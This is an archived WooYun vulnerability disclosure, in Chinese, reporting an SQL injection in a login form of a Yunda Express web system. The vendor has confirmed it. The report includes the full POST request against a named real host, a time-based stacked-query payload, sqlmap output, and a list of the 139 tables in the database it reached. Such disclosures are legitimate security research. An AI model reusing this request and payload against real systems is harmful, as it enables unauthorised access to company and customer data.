当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090335

漏洞标题:韵达快递某系统SQL注入,各种数据库再次侧漏(指哪补哪)~

相关厂商:韵达快递

漏洞作者: 小饼仔

提交时间:2015-01-06 18:37

修复时间:2015-02-20 18:38

公开时间:2015-02-20 18:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-07: 厂商已经确认,细节仅向厂商公开
2015-01-17: 细节向核心白帽子及相关领域专家公开
2015-01-27: 细节向普通白帽子公开
2015-02-06: 细节向实习白帽子公开
2015-02-20: 细节向公众公开

简要描述:

指哪补哪,韵达你真的修复了吗?

详细说明:


点进去看了下,有个页面
http://car.yundasys.com:81/yd_khd/khd_add.php
未授权访问,可以上传任意文件,厂商的确修复了,跳转到了登陆页面

11111111.jpg


看到登陆处,习惯性的输入了单引号,点登陆,没反应,抓包看了下,500错误,估计有戏

2222222222222.jpg


然后随便输入用户名和密码,重复提交了几次,都提示用户名或密码错误,验证码可以重复使用
post请求

POST /yd_khd/login_ajax.php HTTP/1.1
Host: car.yundasys.com:81
Proxy-Connection: keep-alive
Content-Length: 58
Accept: */*
Origin: http://car.yundasys.com:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://car.yundasys.com:81/yd_khd/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: theme=1; PHPSESSID=uml5sm1q4mv2of8b0r6b9orqo2
RA-Ver: 2.8.6
RA-Sid: 65E7C870-20141208-023412-580933-2bd67e
lb=0&sign=login&gsbm=aaa&password=aaaa&v_code1=6657&sb_gs=


漏洞证明:

丢到sqlmap里

---
Place: POST
Parameter: gsbm
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: lb=0&sign=login&gsbm=aaa'; SELECT SLEEP(5)-- &password=aaa&v_code1=9122&sb_gs=
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0.11
current database: 'ydserver'
Database: ydserver
[139 tables]
+----------------------+
| base_accountlimit |
| base_dept_payitem |
| base_gs_services |
| base_payitem |
| base_services |
| bd_townships |
| cainiao_county |
| cfjlb |
| chinese_spell |
| city |
| clfhfs |
| clkfl |
| clklb |
| cllx |
| company_english |
| county |
| county_level_city |
| county_level_city_gs |
| cqkh |
| cz_fl |
| cz_fz |
| czy |
| czygh |
| dbwh_new |
| del_gs |
| deny_ip |
| dmlb |
| fcz |
| fczcy |
| fhdh |
| gs |
| gs_md |
| gs_md_log |
| gs_qjd |
| gs_tz |
| gs_wy |
| gs_wy_bak |
| gs_wy_log |
| gs_wy_xgjl |
| gs_xgjl |
| gsjcb |
| gsjj |
| gsjl |
| gsqx |
| gstmfw |
| hkdm |
| ic_site_bound |
| jbdm |
| jl_uploadexcel |
| jobcls_ratio |
| jobpos_latt_comp |
| log_interface |
| mdz |
| mdzcy |
| op_sap_contrast |
| op_sap_czpara |
| op_sap_gs |
| prep_secret_key |
| province |
| psfwbz |
| pswdjh |
| qx |
| qx_rggy |
| ry |
| ry_rz |
| ry_zw |
| sap_car_basic |
| sap_car_company |
| sheng |
| shi |
| smlb |
| sq_fl |
| sq_fl_log |
| sq_pssx |
| sq_pssx_log |
| sqlj_fl |
| sqlj_fl_log |
| sx_gswh |
| tbkh |
| tbl_ljz |
| tbl_ljz_db |
| tbl_ljz_dtl |
| tbl_ljz_dtl_db |
| tbl_lp_fl |
| tbl_lp_fl_db |
| tbl_pjz |
| tbl_pjz_db |
| tbl_pjz_dtl |
| tbl_pjz_dtl_db |
| tl_jobcls |
| tl_jobcls_dtl |
| tl_jobpos |
| tl_latt_mouth |
| tl_plan |
| tl_user_ratio |
| tm_group |
| tm_group_member |
| tm_level |
| townships |
| vipkhqx |
| wd_menu |
| wd_menu_priv |
| wd_menu_sub |
| wd_menu_sub_priv |
| wd_system |
| wd_system_priv |
| wd_townships |
| wdfl |
| wdjjsj |
| wdjjsj_log |
| wdmdz |
| wdmdz_number |
| wdtmfw |
| wdzzz_bind |
| wdzzz_cw |
| wdzzzbd |
| wjjl |
| wtj |
| www_wd |
| wy |
| wy_ls_fl |
| wy_ps_fl |
| xm |
| xywy |
| ycpsf |
| yd_cas_emp |
| yd_cas_org |
| yd_clear_fbzx |
| yd_sxwh_cl |
| yd_wdgygk |
| ywy |
| ywygroup |
| ywygroup_number |
| zdzzfcz |
| zdzzfcz_bak |
| zdzzmdz |
| zdzzmdz_bak |
| zw |
| zzfl |
+----------------------+


好了,危害什么的,看 WooYun: 韵达某处任意文件上传导致各种数据库侧漏(疑似各种韵达系统数据库) 就知道了,就不深入了

修复方案:

别指哪补哪!

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-07 09:42

厂商回复:

已做修复,谢谢

最新状态:

暂无


漏洞评价:

评论